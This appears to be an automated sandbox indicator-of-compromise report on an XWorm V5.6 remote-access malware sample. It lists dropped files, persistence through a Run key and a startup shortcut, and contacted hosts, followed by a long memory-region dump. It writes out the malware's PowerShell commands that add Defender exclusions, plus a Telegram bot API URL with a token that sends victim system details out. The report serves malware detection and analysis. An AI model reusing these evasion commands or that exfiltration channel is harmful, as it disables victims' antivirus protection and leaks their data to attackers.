IOC Report
file.exe

loading gif

Files

File Path
Type
Category
Malicious
file.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\svchost.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\Log.tmp
ASCII text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1eesaedm.0gz.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22zaeb0w.g0a.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4kbqhrel.ut2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_agesxp1d.nah.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bc2kmm3v.0qb.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_etewax5f.sw1.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqpsser0.l3d.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qobfazny.0fd.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4f3cemm.yfx.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rnumhc4n.afc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sybuh4nv.x1w.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ugwwonhs.xtg.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wl0s3x4r.rgx.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xoyoil5b.itp.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yckccs03.alk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zxe3vo2v.n1y.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Nov 21 20:22:03 2024, mtime=Thu Nov 21 20:22:03 2024, atime=Thu Nov 21 20:22:03 2024, length=74240, window=hide
dropped
There are 12 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\file.exe
"C:\Users\user\Desktop\file.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\svchost.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
malicious
C:\Users\user\AppData\Local\svchost.exe
"C:\Users\user\AppData\Local\svchost.exe"
malicious
C:\Users\user\AppData\Local\svchost.exe
"C:\Users\user\AppData\Local\svchost.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
87.120.112.33
malicious
http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0
unknown
http://nuget.org/NuGet.exe
unknown
https://api.telegram.org
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://api.telegram.org/bot
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://www.micom/pkiops/Docs/ry.htm0
unknown
https://contoso.com/License
unknown
http://crl.mic
unknown
https://contoso.com/Icon
unknown
https://github.com/Pester/Pester
unknown
http://crl.m
unknown
http://crl.microso
unknown
http://crl.mw
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEB905B3EB694EB551DA9%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20FO89G66H%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6
149.154.167.220
http://crl.micft.cMicRosof
unknown
https://aka.ms/pscore68
unknown
http://api.telegram.org
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://crl.micros
unknown
https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=14704
unknown
There are 16 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
bg.microsoft.map.fastly.net
199.232.210.172
api.telegram.org
149.154.167.220

IPs

IP
Domain
Country
Malicious
87.120.112.33
unknown
Bulgaria
malicious
149.154.167.220
api.telegram.org
United Kingdom

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
svchost
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2A23000
trusted library allocation
page read and write
malicious
2A0F000
trusted library allocation
page read and write
malicious
5C2000
unkown
page readonly
malicious
1D6D8F83000
trusted library allocation
page read and write
21FF0E30000
trusted library allocation
page read and write
44C000
heap
page read and write
7FFD9A2DB000
trusted library allocation
page read and write
7FFD9A6D0000
trusted library allocation
page execute and read and write
42FFC79000
stack
page read and write
BF092CB000
stack
page read and write
7FFD9A2A0000
trusted library allocation
page read and write
1AE00000
heap
page execute and read and write
43E000
heap
page read and write
22734FC0000
heap
page read and write
7FFD9A44A000
trusted library allocation
page read and write
1B6BCD25000
heap
page read and write
7DF46D150000
trusted library allocation
page execute and read and write
7FFD9A510000
trusted library allocation
page read and write
1D6D8F11000
trusted library allocation
page read and write
A61000
heap
page read and write
7FFD9A2EC000
trusted library allocation
page execute and read and write
21F80001000
trusted library allocation
page read and write
1D6C9359000
trusted library allocation
page read and write
8FF000
stack
page read and write
227350FF000
heap
page read and write
1B2E3000
heap
page read and write
7FFD9A366000
trusted library allocation
page read and write
7FFD9A4A8000
trusted library allocation
page read and write
1B9A4000
heap
page read and write
21F80088000
trusted library allocation
page read and write
1D6C7490000
heap
page read and write
7FFD9A609000
trusted library allocation
page read and write
7FFD9A540000
trusted library allocation
page read and write
21F81E25000
trusted library allocation
page read and write
7FFD9A6C0000
trusted library allocation
page read and write
1B6D6EF3000
heap
page read and write
7FFD9A29D000
trusted library allocation
page execute and read and write
7FFD9A37C000
trusted library allocation
page execute and read and write
7FFD9A570000
trusted library allocation
page read and write
7FFD9A6E0000
trusted library allocation
page read and write
4280078000
stack
page read and write
1B6EE000
stack
page read and write
1D6C74E0000
heap
page read and write
1D6C74B0000
trusted library section
page read and write
1B6D7248000
heap
page read and write
227352D0000
trusted library allocation
page read and write
1B6BF7E7000
trusted library allocation
page read and write
7FFD9A4B0000
trusted library allocation
page read and write
7FFD9A5C0000
trusted library allocation
page read and write
1B6BF782000
trusted library allocation
page read and write
2272CC4D000
trusted library allocation
page read and write
4280E0C000
stack
page read and write
1D6C8DB5000
heap
page read and write
7FFD9A34C000
trusted library allocation
page execute and read and write
7FFD9A530000
trusted library allocation
page read and write
7FFD9A4D0000
trusted library allocation
page read and write
2AAA000
trusted library allocation
page read and write
AFD000
heap
page read and write
2271AF00000
heap
page read and write
1D6C8DB0000
heap
page read and write
5DBBC8E000
stack
page read and write
7FFD9A2EC000
trusted library allocation
page execute and read and write
7FFD9A2B0000
trusted library allocation
page read and write
21FF17E2000
heap
page read and write
1B6BE751000
trusted library allocation
page read and write
1B6CEA41000
trusted library allocation
page read and write
7FFD9A540000
trusted library allocation
page read and write
21FEF3A0000
heap
page read and write
5DBA95E000
stack
page read and write
5DBAEF9000
stack
page read and write
7FFD9A470000
trusted library allocation
page execute and read and write
7FFD9A2B4000
trusted library allocation
page read and write
24A1000
trusted library allocation
page read and write
1D6CA0EA000
trusted library allocation
page read and write
21FEF3E4000
heap
page read and write
7FFD9A5E9000
trusted library allocation
page read and write
1B6D70C0000
heap
page read and write
7FFD9A619000
trusted library allocation
page read and write
2271C910000
heap
page read and write
1D0000
heap
page read and write
580000
heap
page read and write
1B8F0000
heap
page read and write
1D6C7430000
heap
page read and write
7FFD9A2A0000
trusted library allocation
page read and write
7FFD9A356000
trusted library allocation
page read and write
1B6BE7D6000
trusted library allocation
page read and write
21FF1610000
heap
page read and write
7FFD9A2B3000
trusted library allocation
page execute and read and write
7FFD9A5E0000
trusted library allocation
page read and write
7FFD9A550000
trusted library allocation
page read and write
1D6CA034000
trusted library allocation
page read and write
7FFD9A490000
trusted library allocation
page execute and read and write
7FFD9A35C000
trusted library allocation
page execute and read and write
7FFD9A346000
trusted library allocation
page read and write
21FF14D0000
heap
page execute and read and write
BF0817E000
stack
page read and write
2271AF12000
heap
page read and write
7FFD9A4B0000
trusted library allocation
page read and write
5DBAF3F000
stack
page read and write
191000
stack
page read and write
1D6C7281000
heap
page read and write
1DDA2000
heap
page read and write
7FFD9A3E0000
trusted library allocation
page execute and read and write
7DF46D140000
trusted library allocation
page execute and read and write
7FFD9A6D0000
trusted library allocation
page read and write
7FFD9A472000
trusted library allocation
page read and write
4280D89000
stack
page read and write
7FFD9A471000
trusted library allocation
page read and write
A00000
trusted library allocation
page read and write
1C336000
heap
page read and write
7FFD9A2A4000
trusted library allocation
page read and write
2271AF47000
heap
page read and write
42FFBFE000
stack
page read and write
7FFD9A5F0000
trusted library allocation
page read and write
1D6E1661000
heap
page read and write
21F80C11000
trusted library allocation
page read and write
1B6D6FA0000
trusted library allocation
page read and write
42FFE77000
stack
page read and write
DE5000
heap
page read and write
7FFD9A650000
trusted library allocation
page read and write
1AE1C000
stack
page read and write
7FFD9A5C3000
trusted library allocation
page read and write
A03B80E000
stack
page read and write
5DBB0B8000
stack
page read and write
7FFD9A600000
trusted library allocation
page read and write
7FFD9A290000
trusted library allocation
page read and write
7DF472700000
trusted library allocation
page execute and read and write
7FFD9A720000
trusted library allocation
page read and write
21FF1621000
heap
page read and write
1B6BFFE1000
trusted library allocation
page read and write
A03A77E000
stack
page read and write
1D6C9351000
trusted library allocation
page read and write
1B6D6DDB000
heap
page read and write
2271D51F000
trusted library allocation
page read and write
21FEF3C0000
heap
page read and write
1D6CA7A4000
trusted library allocation
page read and write
1B6BE6B6000
heap
page execute and read and write
7FFD9A5FC000
trusted library allocation
page read and write
42FFB7E000
stack
page read and write
1B6BF756000
trusted library allocation
page read and write
5DBB2BB000
stack
page read and write
BF0924D000
stack
page read and write
651000
heap
page read and write
7FFD9A4F0000
trusted library allocation
page read and write
1D6C74E5000
heap
page read and write
7FFD9A530000
trusted library allocation
page read and write
7FFD9A294000
trusted library allocation
page read and write
21FF14F0000
heap
page execute and read and write
2271B1D0000
heap
page read and write
21FF139F000
heap
page read and write
7FFD9A590000
trusted library allocation
page read and write
227351DF000
heap
page read and write
5DBAE7E000
stack
page read and write
5D0000
heap
page execute and read and write
1D6D9200000
trusted library allocation
page read and write
21FEF44B000
heap
page read and write
2271DC31000
trusted library allocation
page read and write
7FFD9A69C000
trusted library allocation
page read and write
1D6E16E7000
heap
page read and write
7FFD9A560000
trusted library allocation
page read and write
1B6BE5E0000
trusted library allocation
page read and write
1D6C9139000
trusted library allocation
page read and write
2272C921000
trusted library allocation
page read and write
227351BB000
heap
page read and write
A03A6FE000
stack
page read and write
7FFD9A430000
trusted library allocation
page read and write
1DDA8000
heap
page read and write
1B6CE781000
trusted library allocation
page read and write
FEE000
stack
page read and write
2A1F000
trusted library allocation
page read and write
638000
heap
page read and write
7FFD9A608000
trusted library allocation
page read and write
21FF0F01000
heap
page read and write
21FEF340000
heap
page read and write
1D6C7240000
heap
page read and write
7FFD9A460000
trusted library allocation
page execute and read and write
5DBBE07000
stack
page read and write
1D04D000
stack
page read and write
7FFD9A2A2000
trusted library allocation
page read and write
22734EFF000
heap
page read and write
7FFD9A350000
trusted library allocation
page execute and read and write
7FFD9A2FC000
trusted library allocation
page execute and read and write
1D6D91FC000
trusted library allocation
page read and write
1D6C9962000
trusted library allocation
page read and write
2271AF45000
heap
page read and write
1AE02000
heap
page read and write
1B6BF92C000
trusted library allocation
page read and write
7FFD9A4C0000
trusted library allocation
page read and write
D03000
trusted library allocation
page read and write
7FFD9A350000
trusted library allocation
page read and write
BF082FF000
stack
page read and write
7FFD9A5B0000
trusted library allocation
page read and write
21F810C2000
trusted library allocation
page read and write
7FFD9A440000
trusted library allocation
page read and write
2271E274000
trusted library allocation
page read and write
1D6E1386000
heap
page execute and read and write
21FF152D000
heap
page read and write
7FFD9A4B0000
trusted library allocation
page execute and read and write
7FFD9A376000
trusted library allocation
page read and write
7FFD9A5A0000
trusted library allocation
page read and write
7FFD9A570000
trusted library allocation
page read and write
7FFD9A488000
trusted library allocation
page read and write
5DBAFB7000
stack
page read and write
7FFD9A2E0000
trusted library allocation
page read and write
24B1000
trusted library allocation
page read and write
21F902F9000
trusted library allocation
page read and write
21FEF740000
trusted library allocation
page read and write
21FF1648000
heap
page read and write
6BF000
heap
page read and write
4C6000
heap
page read and write
7FFD9A2D0000
trusted library allocation
page read and write
1D6C920E000
trusted library allocation
page read and write
7FFD9A5F8000
trusted library allocation
page read and write
7FFD9A290000
trusted library allocation
page read and write
7FFD9A520000
trusted library allocation
page read and write
BF081FE000
stack
page read and write
1D6E1672000
heap
page read and write
1B25D000
stack
page read and write
1B6BF4C4000
trusted library allocation
page read and write
7FFD9A610000
trusted library allocation
page read and write
2272CC28000
trusted library allocation
page read and write
BF07DCF000
stack
page read and write
7FFD9A740000
trusted library allocation
page read and write
21F90021000
trusted library allocation
page read and write
1B2E0000
heap
page read and write
6B9000
heap
page read and write
7FFD9A2AD000
trusted library allocation
page execute and read and write
7FFD9A4A0000
trusted library allocation
page read and write
1D6E1479000
heap
page read and write
7E0000
heap
page read and write
21FF1532000
heap
page read and write
7FFD9A4A0000
trusted library allocation
page execute and read and write
1C322000
heap
page read and write
2271AF41000
heap
page read and write
2271C875000
heap
page read and write
AE0000
heap
page read and write
1C31F000
heap
page read and write
21F81034000
trusted library allocation
page read and write
BF09347000
stack
page read and write
1D6E139E000
heap
page read and write
2A07000
trusted library allocation
page read and write
1D6E15F8000
heap
page read and write
1D6C8F00000
heap
page read and write
7FFD9A5F3000
trusted library allocation
page read and write
7FFD9A6F6000
trusted library allocation
page read and write
7FFD9A6B0000
trusted library allocation
page execute and read and write
1B6BFED5000
trusted library allocation
page read and write
69F000
heap
page read and write
493000
heap
page read and write
7FFD9A2B0000
trusted library allocation
page read and write
1B6BF358000
trusted library allocation
page read and write
2AA8000
trusted library allocation
page read and write
7FFD9A2AD000
trusted library allocation
page execute and read and write
7FFD9A484000
trusted library allocation
page read and write
7FFD9A6E0000
trusted library allocation
page read and write
21FF1520000
heap
page read and write
1B6BE610000
heap
page execute and read and write
7FFD9A474000
trusted library allocation
page read and write
7FFD9A2AB000
trusted library allocation
page read and write
7FFD9A700000
trusted library allocation
page read and write
7FFD9A5E0000
trusted library allocation
page read and write
1C4B0000
heap
page execute and read and write
7FFD9A6F0000
trusted library allocation
page read and write
7FFD9A710000
trusted library allocation
page read and write
2271AF86000
heap
page read and write
1B7EE000
stack
page read and write
7FFD9A620000
trusted library allocation
page read and write
1D6E13EC000
heap
page read and write
1D6CACF2000
trusted library allocation
page read and write
7FFD9A630000
trusted library allocation
page read and write
D70000
heap
page execute and read and write
42FFCFE000
stack
page read and write
42D000
heap
page read and write
570000
trusted library allocation
page read and write
1D6C8DC1000
heap
page read and write
9B0000
heap
page read and write
1B961000
heap
page read and write
7FFD9A710000
trusted library allocation
page read and write
1C1FE000
stack
page read and write
22735420000
heap
page read and write
1D6E1380000
heap
page execute and read and write
7FFD9A2C0000
trusted library allocation
page read and write
21FF0D90000
heap
page readonly
7FFD9A5B0000
trusted library allocation
page read and write
BF080FE000
stack
page read and write
7FFD9A680000
trusted library allocation
page read and write
A03A87E000
stack
page read and write
21F80F69000
trusted library allocation
page read and write
21FEF41F000
heap
page read and write
21FF1703000
heap
page read and write
1B6BF8B0000
trusted library allocation
page read and write
7FFD9A550000
trusted library allocation
page read and write
1D6C7289000
heap
page read and write
BF087FB000
stack
page read and write
2A93000
trusted library allocation
page read and write
7FFD9A710000
trusted library allocation
page read and write
7FFD9A5F0000
trusted library allocation
page read and write
7FFD9A2CB000
trusted library allocation
page read and write
21F81E05000
trusted library allocation
page read and write
4280D0E000
stack
page read and write
1F0000
heap
page read and write
1AC02000
heap
page read and write
21F813CB000
trusted library allocation
page read and write
1D6C9CF7000
trusted library allocation
page read and write
129A1000
trusted library allocation
page read and write
7FFD9A292000
trusted library allocation
page read and write
1B6D6DCF000
heap
page read and write
7FFD9A6B3000
trusted library allocation
page read and write
5C0000
unkown
page readonly
1D6C924C000
trusted library allocation
page read and write
A8D000
heap
page read and write
2A58000
trusted library allocation
page read and write
1B6CEA5B000
trusted library allocation
page read and write
1D6E14B0000
heap
page read and write
1BFAB000
stack
page read and write
5DBB23F000
stack
page read and write
40000
unkown
page readonly
24AF000
trusted library allocation
page read and write
42FFFFE000
stack
page read and write
7FFD9A2C3000
trusted library allocation
page execute and read and write
1B6BFA59000
trusted library allocation
page read and write
7FFD9A530000
trusted library allocation
page read and write
7FFD9A2A0000
trusted library allocation
page read and write
1D6E171A000
heap
page read and write
7FFD9A510000
trusted library allocation
page read and write
7FFD9A4C0000
trusted library allocation
page read and write
1AF0E000
stack
page read and write
7FFD9A432000
trusted library allocation
page read and write
7FFD9A580000
trusted library allocation
page read and write
7FFD9A590000
trusted library allocation
page read and write
7FFD9A452000
trusted library allocation
page read and write
227351A8000
heap
page read and write
7FFD9A6D0000
trusted library allocation
page read and write
21F8103A000
trusted library allocation
page read and write
7FFD9A6B0000
trusted library allocation
page read and write
7FFD9A2C0000
trusted library allocation
page read and write
7FFD9A5D0000
trusted library allocation
page read and write
7FFD9A6FD000
trusted library allocation
page read and write
7FFD9A640000
trusted library allocation
page read and write
2271AF49000
heap
page read and write
7FFD9A612000
trusted library allocation
page read and write
2271DBA9000
trusted library allocation
page read and write
1C0FF000
stack
page read and write
7FFD9A3B0000
trusted library allocation
page execute and read and write
1B6BE745000
heap
page read and write
7FFD9A2B4000
trusted library allocation
page read and write
1D110000
heap
page read and write
1B6BCD1B000
heap
page read and write
7FFD9A610000
trusted library allocation
page read and write
2271E1B3000
trusted library allocation
page read and write
7FFD9A441000
trusted library allocation
page read and write
2271C8E0000
heap
page execute and read and write
1B8EC000
stack
page read and write
21FF1710000
heap
page read and write
4280E8E000
stack
page read and write
21FF1656000
heap
page read and write
7FFD9A2A0000
trusted library allocation
page read and write
1B6BCD1F000
heap
page read and write
21FF17D6000
heap
page read and write
1D6D8F41000
trusted library allocation
page read and write
21FEF360000
heap
page read and write
2271AED0000
heap
page read and write
7FFD9A396000
trusted library allocation
page execute and read and write
21F80A52000
trusted library allocation
page read and write
227350B0000
heap
page read and write
2271C830000
heap
page readonly
448000
heap
page read and write
7FFD9A450000
trusted library allocation
page read and write
A03ADBE000
stack
page read and write
1B6D6DDE000
heap
page read and write
2271D372000
trusted library allocation
page read and write
42FFF39000
stack
page read and write
7FFD9A6A0000
trusted library allocation
page read and write
7FFD9A2AD000
trusted library allocation
page execute and read and write
42FFFBA000
stack
page read and write
A63000
heap
page read and write
7FFD9A690000
trusted library allocation
page read and write
21F81096000
trusted library allocation
page read and write
1B6D71EB000
heap
page read and write
21FF17D3000
heap
page read and write
22734E96000
heap
page execute and read and write
2271CDED000
trusted library allocation
page read and write
7FFD9A462000
trusted library allocation
page read and write
7FFD9A62C000
trusted library allocation
page read and write
21FF1706000
heap
page read and write
420000
heap
page read and write
1D6CA160000
trusted library allocation
page read and write
1D6C9EB3000
trusted library allocation
page read and write
7FFD9A604000
trusted library allocation
page read and write
7FFD9A5D0000
trusted library allocation
page read and write
5DBBD0C000
stack
page read and write
7FFD9A2CD000
trusted library allocation
page execute and read and write
2271C9A6000
trusted library allocation
page read and write
BF093CD000
stack
page read and write
4AE000
heap
page read and write
7FFD9A490000
trusted library allocation
page read and write
2B08000
trusted library allocation
page read and write
21FEF760000
heap
page read and write
2271E18D000
trusted library allocation
page read and write
2271DBD0000
trusted library allocation
page read and write
2271DC65000
trusted library allocation
page read and write
21F90001000
trusted library allocation
page read and write
A03AC3E000
stack
page read and write
2271AF5D000
heap
page read and write
428017E000
stack
page read and write
1B6BE630000
trusted library allocation
page read and write
1B6BFB15000
trusted library allocation
page read and write
7FFD9A700000
trusted library allocation
page read and write
7FFD9A700000
trusted library allocation
page read and write
1D6E16B1000
heap
page read and write
42FFAFE000
stack
page read and write
7FFD9A6E0000
trusted library allocation
page read and write
7FFD9A293000
trusted library allocation
page execute and read and write
21F80F83000
trusted library allocation
page read and write
1BC24000
stack
page read and write
7FFD9A5B0000
trusted library allocation
page read and write
1D6E1340000
trusted library allocation
page read and write
1CA4E000
stack
page read and write
7FFD9A5C0000
trusted library allocation
page read and write
1B6BCD67000
heap
page read and write
7FFD9A4F0000
trusted library allocation
page read and write
1B6C0574000
trusted library allocation
page read and write
21FF0DF0000
heap
page read and write
2ABA000
trusted library allocation
page read and write
1B6C00A3000
trusted library allocation
page read and write
1C6CA000
stack
page read and write
BF0867E000
stack
page read and write
1B6BCCE0000
heap
page read and write
2272C991000
trusted library allocation
page read and write
1B6D7226000
heap
page read and write
21F81954000
trusted library allocation
page read and write
7FFD9A480000
trusted library allocation
page execute and read and write
21FF1350000
heap
page read and write
22734920000
trusted library allocation
page read and write
7FFD9A2CD000
trusted library allocation
page execute and read and write
1B998000
heap
page read and write
7FFD9A2D0000
trusted library allocation
page read and write
21FEF403000
heap
page read and write
42FFD77000
stack
page read and write
1CA0F000
stack
page read and write
1B6BF9F8000
trusted library allocation
page read and write
1B6CEA3C000
trusted library allocation
page read and write
1B6BF34E000
trusted library allocation
page read and write
1B6D6E6B000
heap
page read and write
7FF4BB450000
trusted library allocation
page execute and read and write
1CD4C000
stack
page read and write
7FFD9A293000
trusted library allocation
page execute and read and write
7FFD9A2A4000
trusted library allocation
page read and write
21FF17C1000
heap
page read and write
2271D9E7000
trusted library allocation
page read and write
1D6C729D000
heap
page read and write
7FFD9A570000
trusted library allocation
page read and write
7FFD9A570000
trusted library allocation
page read and write
1B6BE620000
heap
page readonly
1C2AD000
stack
page read and write
7FFD9A2D0000
trusted library allocation
page read and write
7FFD9A620000
trusted library allocation
page read and write
1C7C8000
stack
page read and write
21F90073000
trusted library allocation
page read and write
1B6BCD63000
heap
page read and write
7FFD9A2C3000
trusted library allocation
page execute and read and write
7FFD9A2B0000
trusted library allocation
page read and write
7FFD9A2BB000
trusted library allocation
page execute and read and write
5DBBF0E000
stack
page read and write
22734F2B000
heap
page read and write
2271E701000
trusted library allocation
page read and write
22735207000
heap
page read and write
1B6D6C75000
heap
page read and write
1B6BE6A0000
heap
page read and write
2272C941000
trusted library allocation
page read and write
1D6CAD17000
trusted library allocation
page read and write
BF091CE000
stack
page read and write
7FFD9A5E3000
trusted library allocation
page read and write
7FFD9A4D0000
trusted library allocation
page read and write
613000
heap
page read and write
502000
heap
page read and write
2A31000
trusted library allocation
page read and write
1CC4A000
stack
page read and write
4280C8C000
stack
page read and write
1B6D71E0000
heap
page read and write
1DDA0000
heap
page read and write
2271C921000
trusted library allocation
page read and write
7FFD9A5D3000
trusted library allocation
page read and write
1D6C8F86000
trusted library allocation
page read and write
1B6BCFC0000
heap
page read and write
1B6CEA4B000
trusted library allocation
page read and write
21FF165E000
heap
page read and write
1D6D8F31000
trusted library allocation
page read and write
1D6C9B07000
trusted library allocation
page read and write
21F81DE0000
trusted library allocation
page read and write
21FF0D80000
trusted library allocation
page read and write
21F9030B000
trusted library allocation
page read and write
BF0877E000
stack
page read and write
21F812AE000
trusted library allocation
page read and write
7FFD9A2EC000
trusted library allocation
page execute and read and write
21FF1666000
heap
page read and write
7FFD9A340000
trusted library allocation
page read and write
1D6C7252000
heap
page read and write
1D6E13A7000
heap
page read and write
1D6D8F20000
trusted library allocation
page read and write
124A3000
trusted library allocation
page read and write
7FFD9A5E0000
trusted library allocation
page read and write
1C324000
heap
page read and write
2B11000
trusted library allocation
page read and write
12418000
trusted library allocation
page read and write
1D6CAD37000
trusted library allocation
page read and write
21FF14F7000
heap
page execute and read and write
A2C000
heap
page read and write
7FFD9A510000
trusted library allocation
page read and write
21FF13B8000
heap
page read and write
2271E726000
trusted library allocation
page read and write
1B96B000
heap
page read and write
1B6C0044000
trusted library allocation
page read and write
1CB4C000
stack
page read and write
5DBB1BE000
stack
page read and write
1C5CE000
stack
page read and write
426000
heap
page read and write
21F80C41000
trusted library allocation
page read and write
21FF16C7000
heap
page read and write
21FF17CB000
heap
page read and write
622000
heap
page read and write
4C4000
heap
page read and write
21FF16A9000
heap
page read and write
1C32C000
heap
page read and write
2411000
trusted library allocation
page read and write
902000
heap
page read and write
7FFD9A6C0000
trusted library allocation
page read and write
7FFD9A386000
trusted library allocation
page execute and read and write
21FEF409000
heap
page read and write
A03A67E000
stack
page read and write
5DBA9DD000
stack
page read and write
911000
stack
page read and write
1B6BE600000
trusted library allocation
page read and write
970000
heap
page read and write
7FFD9A376000
trusted library allocation
page execute and read and write
1C2FF000
stack
page read and write
2271C800000
trusted library allocation
page read and write
BF0944E000
stack
page read and write
1B6C0579000
trusted library allocation
page read and write
1B6BCFC5000
heap
page read and write
446000
heap
page read and write
2990000
heap
page read and write
7FFD9A6AC000
trusted library allocation
page read and write
7FFD9A460000
trusted library allocation
page read and write
2271D527000
trusted library allocation
page read and write
6BB000
heap
page read and write
7FFD9A2C4000
trusted library allocation
page read and write
7FFD9A5B0000
trusted library allocation
page read and write
7FFD9A500000
trusted library allocation
page read and write
7FFD9A2A3000
trusted library allocation
page execute and read and write
2271C870000
heap
page read and write
7FFD9A600000
trusted library allocation
page read and write
2271AEB0000
heap
page read and write
BF08073000
stack
page read and write
2ABD000
trusted library allocation
page read and write
5DBADF9000
stack
page read and write
22734950000
trusted library allocation
page read and write
1D6D9209000
trusted library allocation
page read and write
1B6BE6C0000
trusted library allocation
page read and write
1B6BCDC3000
heap
page read and write
7FFD9A560000
trusted library allocation
page read and write
7FFD9A580000
trusted library allocation
page read and write
7FFD9A730000
trusted library allocation
page read and write
7FFD9A376000
trusted library allocation
page execute and read and write
21FF13EB000
heap
page read and write
1D6C92C1000
trusted library allocation
page read and write
7FFD9A4F0000
trusted library allocation
